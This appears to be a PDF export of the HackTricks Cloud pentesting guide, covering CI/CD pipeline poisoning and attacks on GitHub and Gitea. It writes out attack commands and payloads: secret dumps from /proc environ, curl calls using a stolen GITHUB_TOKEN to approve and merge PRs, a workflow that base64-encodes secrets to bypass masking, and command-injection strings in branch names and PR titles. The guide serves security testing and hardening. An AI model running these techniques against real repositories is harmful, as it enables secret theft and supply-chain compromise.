Hacktricks Cloud
Hacktricks Cloud
Welcome!
HackTricks Cloud 1.1
About the Author 1.2
�?� Pentesting CI/CD
Pentesting CI/CD Methodology 2.1
Github Security 2.2
Basic Github Information 2.2.1
Gitea Security 2.3
Basic Gitea Information 2.3.1
Concourse Security 2.4
Concourse Architecture 2.4.1
Concourse Lab Creation 2.4.2
Concourse Enumeration & Attacks 2.4.3
CircleCI Security 2.5
TravisCI Security 2.6
Basic TravisCI Information 2.6.1
Jenkins Security 2.7
Basic Jenkins Information 2.7.1
Jenkins RCE with Groovy Script 2.7.2
Jenkins RCE Creating/Modifying Project 2.7.3
Jenkins RCE Creating/Modifying Pipeline 2.7.4
Jenkins Dumping Secrets from Groovy 2.7.5
SCM IP Whitelisting Bypass 2.7.6
Apache Airflow Security 2.8
Airflow Configuration 2.8.1
Airflow RBAC 2.8.2
Terraform Security 2.9
Terraform Enterprise Security 2.9.1
Atlantis Security 2.10
Cloudflare Security 2.11
Cloudflare Domains 2.11.1
Cloudflare Zero Trust Network 2.11.2
TODO 2.12
Pentesting Cloud
Pentesting Cloud Methodology 3.1
Kubernetes Pentesting 3.2
Kubernetes Basics 3.2.1
Pentesting Kubernetes Services 3.2.2
Kubelet Authentication & Authorization 3.2.2.1
Exposing Services in Kubernetes 3.2.3
Attacking Kubernetes from inside a Pod 3.2.4
Kubernetes Enumeration 3.2.5
Kubernetes Role-Based Access Control(RBAC) 3.2.6
Abusing Roles/ClusterRoles in Kubernetes 3.2.7
Pod Escape Privileges 3.2.7.1
Kubernetes Roles Abuse Lab 3.2.7.2
Kubernetes Namespace Escalation 3.2.8
Kubernetes Pivoting to Clouds 3.2.9
Kubernetes Network Attacks 3.2.10
Kubernetes Hardening 3.2.11
kubernetes NetworkPolicies 3.2.11.1
Kubernetes SecurityContext(s) 3.2.11.2
Monitoring with Falco 3.2.11.3
GCP Pentesting 3.3
GCP - Basic Information 3.3.1
GCP - Federation Abuse 3.3.1.1
GCP - Non-svc Persistance 3.3.2
GCP - Permissions for a Pentest 3.3.3
GCP - Privilege Escalation 3.3.4
GCP - Apikeys Privesc 3.3.4.1
GCP - Cloudbuild Privesc 3.3.4.2
GCP - Cloudfunctions Privesc 3.3.4.3
GCP - Cloudscheduler Privesc 3.3.4.4
GCP - Compute Privesc 3.3.4.5
GCP - Composer Privesc 3.3.4.6
GCP - Container Privesc 3.3.4.7
GCP - Deploymentmaneger Privesc 3.3.4.8
GCP - IAM Privesc 3.3.4.9
GCP - KMS Privesc 3.3.4.10
GCP - Orgpolicy Privesc 3.3.4.11
GCP - Resourcemanager Privesc 3.3.4.12
GCP - Run Privesc 3.3.4.13
GCP - Secretmanager Privesc 3.3.4.14
GCP - Serviceusage Privesc 3.3.4.15
GCP - Storage Privesc 3.3.4.16
GCP - Misc Perms Privesc 3.3.4.17
GCP - Network Docker Escape 3.3.4.18
GCP - local privilege escalation ssh pivoting 3.3.4.19
GCP - Services 3.3.5
GCP - AI Platform Enum 3.3.5.1
GCP - Cloud Functions, App Engine & Cloud Run Enum
GCP - Compute Instances Enum 3.3.5.3 3.3.5.2
GCP - Compute Network Enum 3.3.5.4
GCP - Compute OS-Config Enum 3.3.5.5
GCP - Containers, GKE & Composer Enum 3.3.5.6
GCP - Databases Enum 3.3.5.7
GCP - Bigquery Enum 3.3.5.7.1
GCP - Bigtable Enum 3.3.5.7.2
GCP - Firebase Enum 3.3.5.7.3
GCP - Firestore Enum 3.3.5.7.4
GCP - Memorystore Enum 3.3.5.7.5
GCP - Spanner Enum 3.3.5.7.6
GCP - SQL Enum 3.3.5.7.7
GCP - DNS Enum 3.3.5.8
GCP - Filestore Enum 3.3.5.9
GCP - IAM & Org Policies Enum 3.3.5.10
GCP - KMS and Secrets Management Enum 3.3.5.11
GCP - Pub/Sub 3.3.5.12
GCP - Source Repositories Enum 3.3.5.13
GCP - Stackdriver Enum 3.3.5.14
GCP - Storage Enum 3.3.5.15
GCP - Unauthenticated Enum 3.3.6
GCP - Public Buckets Privilege Escalation 3.3.6.1
Workspace Pentesting 3.4
AWS Pentesting 3.5
AWS - Basic Information 3.5.1
AWS - Federation Abuse 3.5.1.1
Assume Role & Confused Deputy 3.5.1.2
AWS - Permissions for a Pentest 3.5.2
AWS - Persistence 3.5.3
AWS - Privilege Escalation 3.5.4
AWS - Apigateway Privesc 3.5.4.1
AWS - Codebuild Privesc 3.5.4.2
AWS - Codepipeline Privesc 3.5.4.3
AWS - Codestar Privesc 3.5.4.4
codestar:CreateProject,
codestar:AssociateTeamMember 3.5.4.4.1
iam:PassRole, codestar:CreateProject 3.5.4.4.2
AWS - Cloudformation Privesc 3.5.4.5
iam:PassRole, cloudformation:CreateStack,and
cloudformation:DescribeStacks 3.5.4.5.1
AWS - Cognito Privesc 3.5.4.6
AWS - Datapipeline Privesc 3.5.4.7
AWS - Directory Services Privesc 3.5.4.8
AWS - DynamoDB Privesc 3.5.4.9
AWS - EBS Privesc 3.5.4.10
AWS - EC2 Privesc 3.5.4.11
AWS - ECR Privesc 3.5.4.12
AWS - ECS Privesc 3.5.4.13
AWS - EFS Privesc 3.5.4.14
AWS - Elastic Beanstalk Privesc 3.5.4.15
AWS - EMR Privesc 3.5.4.16
AWS - Glue Privesc 3.5.4.17
AWS - IAM Privesc 3.5.4.18
AWS - KMS Privesc 3.5.4.19
AWS - Lambda Privesc 3.5.4.20
AWS - Steal Lambda Requests 3.5.4.20.1
AWS - Lightsail Privesc 3.5.4.21
AWS - MQ Privesc 3.5.4.22
AWS - MSK Privesc 3.5.4.23
AWS - RDS Privesc 3.5.4.24
AWS - Redshift Privesc 3.5.4.25
AWS - S3 Privesc 3.5.4.26
AWS - Sagemaker Privesc 3.5.4.27
AWS - Secrets Manager Privesc 3.5.4.28
AWS - SSM Privesc 3.5.4.29
AWS - STS Privesc 3.5.4.30
AWS - WorkDocs Privesc 3.5.4.31
AWS - Misc Privesc 3.5.4.32
route53:CreateHostedZone,
route53:ChangeResourceRecordSets, acm-
pca:IssueCertificate, acm-pca:GetCer 3.5.4.32.1
AWS - Services 3.5.5
AWS - Security & Detection Services 3.5.5.1
AWS - CloudTrail Enum 3.5.5.1.1
AWS - CloudWatch Enum 3.5.5.1.2
AWS - Config Enum 3.5.5.1.3
AWS - Cost Explorer Enum 3.5.5.1.4
AWS - Detective Enum 3.5.5.1.5
AWS - Firewall Manager Enum 3.5.5.1.6
AWS - GuardDuty Enum 3.5.5.1.7
AWS - Inspector Enum 3.5.5.1.8
AWS - Macie Enum 3.5.5.1.9
AWS - Security Hub Enum 3.5.5.1.10
AWS - Shield Enum 3.5.5.1.11
AWS - Trusted Advisor Enum 3.5.5.1.12
AWS - WAF Enum 3.5.5.1.13
AWS - Databases 3.5.5.2
AWS - DynamoDB Enum 3.5.5.2.1
AWS - Redshift Enum 3.5.5.2.2
AWS - DocumentDB Enum 3.5.5.2.3
AWS - Relational Database (RDS) Enum 3.5.5.2.4
AWS - API Gateway Enum 3.5.5.3
AWS - CloudFormation & Codestar Enum 3.5.5.4
AWS - CloudHSM Enum 3.5.5.5
AWS - CloudFront Enum 3.5.5.6
AWS - Cognito Enum 3.5.5.7
Cognito Identity Pools 3.5.5.7.1
Cognito User Pools 3.5.5.7.2
AWS - DataPipeline, CodePipeline, CodeBuild &
CodeCommit 3.5.5.8
AWS - Directory Services / WorkDocs 3.5.5.9
AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum 3.5.5.10
AWS - VPCs-Network-Subnetworks-Ifaces-SecGroups-
NAT 3.5.5.10.1
AWS - SSM Post-Exploitation 3.5.5.10.2
AWS - Malicious VPC Mirror 3.5.5.10.3
AWS - ECS, ECR & EKS Enum 3.5.5.11
AWS - Elastic Beanstalk Enum 3.5.5.12
AWS - EMR Enum 3.5.5.13
AWS - EFS Enum 3.5.5.14
AWS - Kinesis Data Firehose 3.5.5.15
AWS - IAM & STS Enum 3.5.5.16
AWS - Confused deputy 3.5.5.16.1
AWS - KMS Enum 3.5.5.17
AWS - Lambda Enum 3.5.5.18
AWS - Lightsail Enum 3.5.5.19
AWS - MQ Enum 3.5.5.20
AWS - MSK Enum 3.5.5.21
AWS - Route53 Enum 3.5.5.22
AWS - Secrets Manager Enum 3.5.5.23
AWS - SQS & SNS Enum 3.5.5.24
AWS - S3, Athena & Glacier Enum 3.5.5.25
S3 Ransomware 3.5.5.25.1
AWS - Other Services Enum 3.5.5.26
AWS - Unauthenticated Enum & Access 3.5.6
AWS - Accounts Unauthenticated Enum 3.5.6.1
AWS - Api Gateway Unauthenticated Enum 3.5.6.2
AWS - Cloudfront Unauthenticated Enum 3.5.6.3
AWS - Cognito Unauthenticated Enum 3.5.6.4
AWS - DocumentDB Unauthenticated Enum 3.5.6.5
AWS - EC2 Unauthenticated Enum 3.5.6.6
AWS - Elasticsearch Unauthenticated Enum 3.5.6.7
AWS - IAM Unauthenticated Enum 3.5.6.8
AWS - IoT Unauthenticated Enum 3.5.6.9
AWS - Kinesis Video Unauthenticated Enum 3.5.6.10
AWS - Lambda Unauthenticated Access 3.5.6.11
AWS - Media Unauthenticated Enum 3.5.6.12
AWS - MQ Unauthenticated Enum 3.5.6.13
AWS - MSK Unauthenticated Enum 3.5.6.14
AWS - RDS Unauthenticated Enum 3.5.6.15
AWS - Redshift Unauthenticated Enum 3.5.6.16
AWS - SQS Unauthenticated Enum 3.5.6.17
AWS - S3 Unauthenticated Enum 3.5.6.18
Azure Pentesting 3.6
Az - Basic Information 3.6.1
Az - Unauthenticated Enum & Initial Entry 3.6.2
Az - Illicit Consent Grant 3.6.2.1
Az - Device Code Authentication Phishing 3.6.2.2
Az - Password Spraying 3.6.2.3
Az - Services 3.6.3
Az - Application Proxy 3.6.3.1
Az - ARM Templates / Deployments 3.6.3.2
Az - Automation Account 3.6.3.3
Az - State Configuration RCE 3.6.3.3.1
Az - AzureAD 3.6.3.4
Az - Azure App Service & Function Apps 3.6.3.5
Az - Blob Storage 3.6.3.6
Az - Intune 3.6.3.7
Az - Keyvault 3.6.3.8
Az - Virtual Machines 3.6.3.9
Az - Permissions for a Pentest 3.6.4
Az - Lateral Movement (Cloud - On-Prem) 3.6.5
Az - Pass the Cookie 3.6.5.1
Az - Pass the PRT 3.6.5.2
Az - Pass the Certificate 3.6.5.3
Az - Local Cloud Credentials 3.6.5.4
Azure AD Connect - Hybrid Identity 3.6.5.5
Federation 3.6.5.5.1
PHS - Password Hash Sync 3.6.5.5.2
PTA - Pass-through Authentication 3.6.5.5.3
Seamless SSO 3.6.5.5.4
Az - Persistence 3.6.6
Az - Dynamic Groups Privesc 3.6.7
Digital Ocean Pentesting 3.7
DO - Basic Information 3.7.1
DO - Permissions for a Pentest 3.7.2
DO - Services 3.7.3
DO - Apps 3.7.3.1
DO - Container Registry 3.7.3.2
DO - Databases 3.7.3.3
DO - Droplets 3.7.3.4
DO - Functions 3.7.3.5
DO - Images 3.7.3.6
DO - Kubernetes (DOKS) 3.7.3.7
DO - Networking 3.7.3.8
DO - Projects 3.7.3.9
DO - Spaces 3.7.3.10
DO - Volumes 3.7.3.11
Pentesting Network Services
HackTricks Pentesting Network 4.1
HackTricks Pentesting Services 4.2
HackTricks Cloud
Support HackTricks and get benefits!
Welcome to the page where you will find each hacking
trick/technique/whatever related to CI/CD & Cloud I have learnt in
CTFs, real life environments, and reading researches and news.
Pentesting CI/CD Methodology
In the HackTricks CI/CD Methodology you will find how to pentest
infrastructure related to CI/CD activities. Read the following page for an
introduction:
pentesting-ci-cd-methodology.md
Pentesting Cloud Methodology
In the HackTricks Cloud Methodology you will find how to pentest
cloud environments. Read the following page for an introduction:
pentesting-cloud-methodology.md
License
Copyright © Carlos Polop 2022. Except where otherwise specified (the
external information copied into the book belongs to the original
authors), the text on HACK TRICKS CLOUD by Carlos Polop is
licensed under the Attribution-NonCommercial 4.0 International (CC
BY-NC 4.0). If you want to use it with commercial purposes, contact
me.
VCS
VCS stands for Version Control System, this systems allows developers to
manage their source code. The most common one is git and you will
usually find companies using it in one of the following platforms:
Github
Gitlab
Bitbucket
Gitea
Cloud providers (they offer their own VCS platforms)
Pipelines
Pipelines allow developers to automate the execution of code (for
building, testing, deploying... purposes) after certain actions occurs: A push,
a PR, cron... They are terrible useful to automate all the steps from
development to production.
Platforms that contains the source code of your project contains sensitive
information and people need to be very careful with the permissions granted
inside this platform. These are some common problems across VCS
platforms that attacker could abuse:
Leaks: If your code contains leaks in the commits and the attacker can
access the repo (because it's public or because he has access), he could
discover the leaks.
Access: If an attacker can access to an account inside the VCS
platform he could gain more visibility and permissions.
Register: Some platforms will just allow external users to create
an account.
SSO: Some platforms won't allow users to register, but will allow
anyone to access with a valid SSO (so an attacker could use his
github account to enter for example).
Credentials: Username+Pwd, personal tokens, ssh keys, Oauth
tokens, cookies... there are several kind of tokens a user could
steal to access in some way a repo.
Webhooks: VCS platforms allow to generate webhooks. If they are
not protected with non visible secrets an attacker could abuse them.
If no secret is in place, the attacker could abuse the webhook of
the third party platform
If the secret is in the URL, the same happens and the attacker also
have the secret
Code compromise: If a malicious actor has some kind of write access
over the repos, he could try to inject malicious code. In order to be
successful he might need to bypass branch protections. These actions
can be performed with different goals in mid:
Compromise the main branch to compromise production.
Compromise the main (or other branches) to compromise
developers machines (as they usually execute test, terraform or
other things inside the repo in their machines).
Compromise the pipeline (check next section)
Pipelines Pentesting Methodology
The most common way to define a pipeline, is by using a CI configuration
file hosted in the repository the pipeline builds. This file describes the
order of executed jobs, conditions that affect the flow, and build
environment settings.\ These files typically have a consistent name and
format, for example — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab),
.circleci/config.yml (CircleCI), and the GitHub Actions YAML files located
under .github/workflows. When triggered, the pipeline job pulls the code
from the selected source (e.g. commit / branch), and runs the commands
specified in the CI configuration file against that code.
D-PPE: A Direct PPE attack occurs when the actor modifies the CI
config file that is going to be executed.
I-DDE: An Indirect PPE attack occurs when the actor modifies a file
the CI config file that is going to be executed relays on (like a make
file or a terraform config).
Public PPE or 3PE: In some cases the pipelines can be triggered by
users that doesn't have write access in the repo (and that might not
even be part of the org) because they can send a PR.
3PE Command Injection: Usually, CI/CD pipelines will set
environment variables with information about the PR. If that
value can be controlled by an attacker (like the title of the PR)
and is used in a dangerous place (like executing sh commands),
an attacker might inject commands in there.
Exploitation Benefits
Knowing the 3 flavours to poison a pipeline, lets check what an attacker
could obtain after a successful exploitation:
Secrets: As it was mentioned previously, pipelines require privileges
for their jobs (retrieve the code, build it, deploy it...) and this privileges
are usually granted in secrets. These secrets are usually accessible via
env variables or files inside the system. Therefore an attacker will
always try to exfiltrate as much secrets as possible.
Depending on the pipeline platform the attacker might need to
specify the secrets in the config. This means that is the attacker
cannot modify the CI configuration pipeline (I-PPE for example),
he could only exfiltrate the secrets that pipeline has.
Computation: The code is executed somewhere, depending on where
is executed an attacker might be able to pivot further.
On-Premises: If the pipelines are executed on premises, an
attacker might end in an internal network with access to more
resources.
Cloud: The attacker could access other machines in the cloud
but also could exfiltrate IAM roles/service accounts tokens from
it to obtain further access inside the cloud.
Platforms machine: Sometimes the jobs will be execute inside
the pipelines platform machines, which usually are inside a
cloud with no more access.
Select it: Sometimes the pipelines platform will have
configured several machines and if you can modify the CI
configuration file you can indicate where you want to run the
malicious code. In this situation, an attacker will probably run a
reverse shell on each possible machine to try to exploit it further.
Compromise production: If you ware inside the pipeline and the final
version is built and deployed from it, you could compromise the code
that is going to end running in production.
More relevant info
Tools & CIS Benchmark
Chain-bench is an open-source tool for auditing your software supply
chain stack for security compliance based on a new CIS Software
Supply Chain benchmark. The auditing focuses on the entire SDLC
process, where it can reveal risks from code time into deploy time.
Labs
On each platform that you can run locally you will find how to launch
it locally so you can configure it as you want to test it
Gitea + Jenkins lab: https://github.com/cider-security-research/cicd-
goat
Automatic Tools
Checkov: Checkov is a static code analysis tool for infrastructure-as-
code.
References
https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-
execution/?
utm_source=github&utm_medium=github_page&utm_campaign=ci%
2fcd%20goat_060422
Basic Information
basic-github-information.md
External Recon
Github repositories can be configured as public, private and internal.
In case you know the user, repo or organisation you want to target you
can use github dorks to find sensitive information or search for sensitive
information leaks on each repo.
Github Dorks
Github allows to search for something specifying as scope a user, a repo
or an organisation. Therefore, with a list of strings that are going to appear
close to sensitive information you can easily search for potential sensitive
information in your target.
https://github.com/zricethezav/gitleaks
https://github.com/trufflesecurity/truffleHog
https://github.com/eth0izzle/shhgit
https://github.com/michenriksen/gitrob
https://github.com/anshumanbh/git-all-secrets
https://github.com/kootenpv/gittyleaks
https://github.com/awslabs/git-secrets
External Forks
It's possible to compromise repos abusing pull requests. To know if a
repo is vulnerable you mostly need to read the Github Actions yaml
configs. More info about this below.
Organization Hardening
Member Privileges
There are some default privileges that can be assigned to members of the
organization. These can be controlled from the page
https://github.com/organizations/<org_name>/settings/member_privil
Actions Settings
Several security related settings can be configured for actions from the page
https://github.com/organizations/<org_name>/settings/actions .
Note that all this configurations can also be set on each repository
independently
Integrations
Let me know if you know the API endpoint to access this info!
Note that 2FA may be used so you will only be able to access this
information if you can also pass that check.
Check the section below about branch protections bypasses in case it's
useful.
If the user has configured its username as his github username you can
access the public keys he has set in his account in https://github.com/.keys,
you could check this to confirm the private key you found can be used.
SSH keys can also be set in repositories as deploy keys. Anyone with
access to this key will be able to launch projects from a repository.
Usually in a server with different deploy keys the local file ~/.ssh/config
GPG Keys
As explained here sometimes it's needed to sign the commits or you might
get discovered.
A user token can be used instead of a password for Git over HTTPS, or
can be used to authenticate to the API over Basic Authentication.
Depending on the privileges attached to it you might be able to perform
different actions.
These are the scopes an Oauth application can request. A should always
check the scopes requested before accepting them.
In case you can execute arbitrary github actions in a repository, you can
steal the secrets from that repo.
pull_request
pull_request_target
It might look like because the executed workflow is the one defined in the
base and not in the PR it's secure to use pull_request_target , but there
are a few cases were it isn't.
jobs:
build:
name: Build and test
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
with:
ref: ${ { github.event.pull_request.head.sha }}
- uses: actions/setup-node@v1
- run: |
npm install
npm build
- uses: completely/fakeaction@v2
with:
arg1: ${ { secrets.supersecret }}
- uses: fakerepo/comment-on-pr@v1
with:
message: |
Thank you!
The potentially untrusted code is being run during npm install or npm
build as the build scripts and referenced packages are controlled by the
author of the PR.
cat /proc/<proc_number>/environ
cat /proc/*/environ | grep -i secret #Suposing the env variable
name contains "secret"
aws-federation-abuse.md
gcp-federation-abuse.md
GITHUB_TOKEN
This "secret" (coming from ${ { secrets.GITHUB_TOKEN }} and ${ {
Note that the token expires after the job has completed.\ These tokens
looks like this: ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7
https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_n
umber>/merge
-H "Accept: application/vnd.github.v3+json" \
--header "authorization: Bearer $GITHUB_TOKEN" \
--header 'content-type: application/json' \
-d '{"commit_title":"commit_title"}'
# Approve a PR
curl -X POST \
https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_n
umber>/reviews
-H "Accept: application/vnd.github.v3+json" \
--header "authorization: Bearer $GITHUB_TOKEN" \
--header 'content-type: application/json' \
-d '{"event":"APPROVE"}'
# Create a PR
curl -X POST \
-H "Accept: application/vnd.github.v3+json" \
--header "authorization: Bearer $GITHUB_TOKEN" \
--header 'content-type: application/json' \
https://api.github.com/repos/<org_name>/<repo_name>/pulls
-d '{"head":"<branch_name>","base":"master",
"title":"title"}'
Note that in several occasions you will be able to find github user tokens
inside Github Actions envs or in the secrets. These tokens may give you
more privileges over the repository and organization.
List secrets in Github Action output
name: list_env
on:
workflow_dispatch: # Launch manually
pull_request: #Run it when a PR is created to a branch
branches:
- '**'
push: # Run it when a push is made to a branch
branches:
- '**'
jobs:
List_env:
runs-on: ubuntu-latest
steps:
- name: List Env
# Need to base64 encode or github will change the
secret value for "***"
run: sh -c 'env | grep "secret_" | base64 -w0'
env:
secret_myql_pass: ${ {secrets.MYSQL_PASSWORD}}
secret_postgress_pass: ${
{secrets.POSTGRESS_PASSWORDyaml}}
Script Injections
Note that there are certain github contexts ** whose values are controlled
by the user creating the PR. If the github action is using that data to
execute anything, it could lead to arbitrary code execution. These contexts
typically end with body , default_branch , email , head_ref ,
label , message , name , page_name , ref , and title . For example
(list from this [writeup**](https://medium.com/tinder/exploiting-github-
actions-on-open-source-projects-5d93936d189f)):
github.event.comment.body
github.event.issue.body
github.event.issue.title
github.head_ref
github.pull_request.*
github.*.*.authors.name
github.*.*.authors.email
Note that here are less obvious sources of potentially untrusted input, such
as branch names and email addresses, which can be quite flexible in terms
of their permitted content. For example, zzz";echo${IFS}"hello";#
would be a valid branch name and would be a possible attack vector for a
target repository.
To inject commands into this workflow, the attacker could create a pull
request with a title of a"; ls $GITHUB_WORKSPACE" :
command to be executed on the runner. You can see the output of the ls
uses: fakeaction/publish@v3
with:
key: ${ { secrets.PUBLISH_KEY }}
Cache Poisoning
Using the action/cache Git action anywhere in the CI will run two steps:
one step will take place during the run process when it’s called and the
other will take place post workflow (if the run action returned a cache-
miss).
Run action – is used to search and retrieve the cache. The search is
done using the cache key, with the result being either a cache-hit
(success, data found in cache) or cache-miss. If found, the files and
directories are retrieved from the cache for active use. If the result is
cache-miss, the desired files and directories are downloaded as if it
was the first time they are called.
Post workflow action – used for saving the cache. If the result of the
cache call in the run action returns a cache-miss, this action will save
the current state of the directories we want to cache with the provided
key. This action happens automatically and doesn’t need to be
explicitly called.
Access restrictions provide cache isolation and security by creating a
logical boundary between different branches (for example: a cache
created for the branch Feature-A [with the base main] would not be
accessible to a pull request for the branch Feature-B [with the base main]).
The cache action first searches cache hits for a key and restores keys in the
branch containing the workflow run. If there are no hits in the current
branch, the cache action searches for the key and restores keys in the parent
branch and upstream branches.
Another important note is that GitHub does not allow modifications once
entries are pushed – cache entries are read-only records.
The unit-test workflow uses a malicious action that adds a cache entry with
malicious content by changing a Golang logging library
(go.uber.org/zap@v1) to add the string, ‘BAD library’ to the application
artifact description.
Next, the release workflow uses this poisoned cache entry. As a result, the
malicious code is injected into the built Golang binary and image. The
cache remains poisoned until the entry key is discarded (usually triggered
by dependency updates). The same poisoned cache will affect any other
workflow, run, and child branch using the same cache key.
This was in version 0.4.1. Next, we updated the tag and rebuilt the image
several times, and observed that ‘Bad library’ remained in the description.
Artifact Poisoning
There are several Github Actions that allows to download artifacts from
other repositories. These other repositories will usually have a Gihub
Action to upload the artifact that will be later be downloaded.\ If the
Github Action of the repo that uploads the artifact allows the
pull_request or pull_request_target (using the attackers code), an
attacker will be able to trigger the Action that will upload an Artifact
created from his code, so then any other repo downloading and executing
the latest artifact will be compromised.
For more info and defence options (such as hardcoding the artifact to
download) check https://www.legitsecurity.com/blog/artifact-poisoning-
vulnerability-discovered-in-rust
In case an environment can be accessed from all the branches, it's isn't
protected and you can easily access the secrets inside the environment.
Note that you might find repos where all the branches are protected (by
specifying its names or by using * ) in that scenario, find a branch were
you can push code and you can exfiltrate the secrets creating a new github
action (or modifying one).
Note, that you might find the edge case where all the branches are
protected (via wildcard * ) it's specified who can push code to the
branches (you can specify that in the branch protection) and your user
isn't allowed. You can still run a custom github action because you can
create a branch and use the push trigger over itself. The branch protection
allows the push to a new branch so the github action will be triggered.
Note that after the creation of the branch the branch protection will
apply to the new branch and you won't be able to modify it, but for that
time you will have already dumped the secrets.
Persistence
Generate user token
Steal github tokens from secrets
Deletion of workflow results and branches
Give more permissions to all the org
Create webhooks to exfiltrate information
Invite outside collaborators
Remove webhooks used by the SIEM
Create/modify Github Action with a backdoor
Find vulnerable Github Action to command injection via secret
value modification
Organization Roles
In an organisation users can have different roles:
Members Privileges
In https://github.com/organizations//settings/member_privileges you can
see the permissions users will have just for being part of the
organisation.
Repository Roles
By default repository roles are created:
Teams
You can list the teams created in an organization in
https://github.com/orgs//teams. Note that to see the teams which are
children of other teams you need to access each parent team.
Users
The users of an organization can be listed in
https://github.com/orgs//people.
In the information of each user you can see the teams the user is member
of, and the repos the user has access to.
Github Authentication
Github offers different ways to authenticate to your account and perform
actions on your behalf.
Web Access
Accessing github.com you can login using your username and password
(and a 2FA potentially).
SSH Keys
You can configure your account with one or several public keys allowing
the related private key to perform actions on your behalf.
https://github.com/settings/keys
GPG Keys
You cannot impersonate the user with these keys but if you don't use it it
might be possible that you get discover for sending commits without a
signature. Learn more about vigilant mode here.
Oauth Applications
Oauth applications may ask you for permissions to access part of your
github information or to impersonate you to perform some actions. A
common example of this functionality is the login with github button you
might find in some platforms.
Github Applications
Github applications can ask for permissions to access your github
information or impersonate you to perform specific actions over specific
resources. In Github Apps you need to specify the repositories the app will
have access to.
Github Actions
This isn't a way to authenticate in github, but a malicious Github Action
could get unauthorised access to github and depending on the privileges
given to the Action several different attacks could be done. See below for
more information.
Git Actions
Git actions allows to automate the execution of code when an event
happen. Usually the code executed is somehow related to the code of the
repository (maybe build a docker container or check that the PR doesn't
contain secrets).
Configuration
In https://github.com/organizations//settings/actions it's possible to check
the configuration of the github actions for the organization.
It's possible to disallow the use of github actions completely, allow all
github actions, or just allow certain actions.
It's also possible to configure who needs approval to run a Github Action
and the permissions of the GITHUB_TOKEN of a Github Action when
it's run.
Git Secrets
Github Action usually need some kind of secrets to interact with github or
third party applications. To avoid putting them in clear-text in the repo,
github allow to put them as Secrets.
These secrets can be configured for the repo or for all the organization.
Then, in order for the Action to be able to access the secret you need to
declare it like:
steps:
- name: Hello world action
with: # Set the secret as an input
super_secret: ${ { secrets.SuperSecret }}
env: # Or as an environment variable
super_secret: ${ { secrets.SuperSecret }}
steps:
- shell: bash
env:
SUPER_SECRET: ${ { secrets.SuperSecret }}
run: |
example-command "$SUPER_SECRET"
Secrets can only be accessed from the Github Actions that have them
declared.
Therefore, the only way to steal github secrets is to be able to access the
machine that is executing the Github Action (in that scenario you will be
able to access only the secrets declared for the Action).
Git Environments
Github allows to create environments where you can save secrets. Then,
you can give the github action access to the secrets inside the environment
with something like:
jobs:
deployment:
runs-on: ubuntu-latest
environment: env_name
You can require a PR before merging (so you cannot directly merge
code over the branch). If this is select different other protections can be
in place:
Require a number of approvals. It's very common to require 1
or 2 more people to approve your PR so a single user isn't capable
of merge code directly.
Dismiss approvals when new commits are pushed. If not, a
user may approve legit code and then the user could add
malicious code and merge it.
Require reviews from Code Owners. At least 1 code owner of
the repo needs to approve the PR (so "random" users cannot
approve it)
Restrict who can dismiss pull request reviews. You can specify
people or teams allowed to dismiss pull request reviews.
Allow specified actors to bypass pull request requirements.
These users will be able to bypass previous restrictions.
Require status checks to pass before merging. Some checks needs to
pass before being able to merge the commit (like a github action
checking there isn't any cleartext secret).
Require conversation resolution before merging. All comments on
the code needs to be resolved before the PR can be merged.
Require signed commits. The commits need to be signed.
Require linear history. Prevent merge commits from being pushed to
matching branches.
Include administrators. If this isn't set, admins can bypass the
restrictions.
Restrict who can push to matching branches. Restrict who can send
a PR.
As you can see, even if you managed to obtain some credentials of a user,
repos might be protected avoiding you to pushing code to master for
example to compromise the CI/CD pipeline.
References
https://docs.github.com/en/organizations/managing-access-to-your-
organizations-repositories/repository-roles-for-an-organization
https://docs.github.com/en/[email protected]/admin/user-
management/managing-users-in-your-enterprise/roles-in-an-
enterprisehttps://docs.github.com/en/enterprise-server
https://docs.github.com/en/get-started/learning-about-github/access-
permissions-on-github
https://docs.github.com/en/account-and-profile/setting-up-and-
managing-your-github-user-account/managing-user-account-
settings/permission-levels-for-user-owned-project-boards
https://docs.github.com/en/actions/security-guides/encrypted-secrets
Basic Information
basic-gitea-information.md
Lab
To run a Gitea instance locally you can just run a docker container:
Note that by default Gitea allows new users to register. This won't give
specially interesting access to the new users over other organizations/users
repos, but a logged in user might be able to visualize more repos or
organizations.
Internal Exploitation
For this scenario we are going to suppose that you have obtained some
access to a github account.
Note that 2FA may be used so you will only be able to access this
information if you can also pass that check.
With this key you can perform changes in repositories where the user has
some privileges, however you can not use it to access gitea api to
enumerate the environment. However, you can enumerate local settings to
get information about the repos and user you have access to:
If the user has configured its username as his gitea username you can access
the public keys he has set in his account in https://github.com/.keys, you
could check this to confirm the private key you found can be used.
SSH keys can also be set in repositories as deploy keys. Anyone with
access to this key will be able to launch projects from a repository.
Usually in a server with different deploy keys the local file ~/.ssh/config
GPG Keys
As explained here sometimes it's needed to sign the commits or you might
get discovered.
As explained in the basic information, the application will have full access
over the user account.
Enable Push: If anyone with write access can push to the branch, just
push to it.
Whitelist Restricted Push: The same way, if you are part of this list
push to the branch.
Enable Merge Whitelist: If there is a merge whitelist, you need to be
inside of it
Require approvals is bigger than 0: Then... you need to compromise
another user
Restrict approvals to whitelisted: If only whitelisted users can
approve... you need to compromise another user that is inside that list
Dismiss stale approvals: If approvals are not removed with new
commits, you could hijack an already approved PR to inject your code
and merge the PR.
Note that if you are an org/repo admin you can bypass the protections.
Enumerate Webhooks
Webhooks are able to send specific gitea information to some places.
You might be able to exploit that communication.\ However, usually a
secret you can not retrieve is set in the webhook that will prevent external
users that know the URL of the webhook but not the secret to exploit that
webhook.\ But in some occasions, people instead of setting the secret in its
place, they set it in the URL as a parameter, so checking the URLs could
allow you to find secrets and other places you could exploit further.
In the gitea path (by default: /data/gitea) you can find also interesting
information like:
The sqlite DB: If gitea is not using an external db it will use a sqlite db
The sessions inside the sessions folder: Running cat
sessions/*/*/* you can see the usernames of the logged users (gitea
could also save the sessions inside the DB).
The jwt private key inside the jwt folder
More sensitive information could be found in this folder
If you are inside the server you can also use the gitea binary to
access/modify information:
INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET will
generate a token of the indicated type (persistence)
gitea admin user change-password --username admin --password
A user may also be part of different teams with different permissions over
different repos.
Public
Limited (logged in users only)
Private (members only)
